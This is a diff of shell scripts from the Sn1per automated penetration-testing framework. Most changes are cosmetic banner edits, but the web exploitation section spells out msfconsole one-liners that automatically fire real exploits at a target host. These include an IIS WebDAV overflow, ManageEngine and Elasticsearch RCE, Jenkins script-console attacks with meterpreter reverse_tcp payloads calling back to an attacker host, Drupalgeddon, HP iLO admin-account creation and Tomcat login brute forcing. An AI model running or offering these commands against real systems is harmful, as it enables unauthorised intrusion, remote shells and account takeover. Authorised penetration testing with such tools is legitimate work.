echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
|
||||
fi
|
||||
|
|
@ -371,9 +381,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ $WEB_BRUTE_STEALTHSCAN == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
|
|
@ -400,9 +410,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null$RESET"
|
||||
fi
|
||||
|
|
@ -410,9 +420,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
|
|
@ -423,16 +433,15 @@ if [ "$MODE" = "stealth" ]; then
|
|||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
|
|
@ -449,6 +458,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e ""
|
||||
echo -e ""
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-stealth.txt $LOOT_DIR/scans/finished-$TARGET-stealth.txt 2> /dev/null
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
|
|
|
|||
|
|
@ -7,7 +7,7 @@ if [ "$MODE" = "vulnscan" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -21,6 +21,7 @@ if [ "$MODE" = "vulnscan" ]; then
|
|||
args="$args --noreport -m vulnscan"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-vulnscan.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
|
@ -34,9 +35,9 @@ if [ "$MODE" = "vulnscan" ]; then
|
|||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
if [ "$OPENVAS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OPENVAS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
ASSET_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="<create_target><name>$TARGET</name><hosts>$TARGET</hosts></create_target>" | xmlstarlet sel -t -v /create_target_response/@id) && echo "ASSET_ID: $ASSET_ID"
|
||||
TASK_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<create_task><name>$TARGET</name><preferences><preference><scanner_name>source_iface</scanner_name><value>eth0</value></preference></preferences><config id=\"74db13d6-7489-11df-91b9-002264764cea\"/><target id=\"$ASSET_ID\"/></create_task>" | xmlstarlet sel -t -v /create_task_response/@id) && echo "TASK_ID: $TASK_ID"
|
||||
REPORT_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<start_task task_id=\"$TASK_ID\"/>" | cut -d\> -f3 | cut -d\< -f1) && echo "REPORT_ID: $REPORT_ID"
|
||||
|
|
@ -56,10 +57,11 @@ if [ "$MODE" = "vulnscan" ]; then
|
|||
omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET
|
||||
fi
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-vulnscan.txt $LOOT_DIR/scans/finished-$TARGET-vulnscan.txt 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
|
|
|
|||
|
|
@ -4,7 +4,7 @@ if [ "$MODE" = "web" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -1,213 +1,213 @@
|
|||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
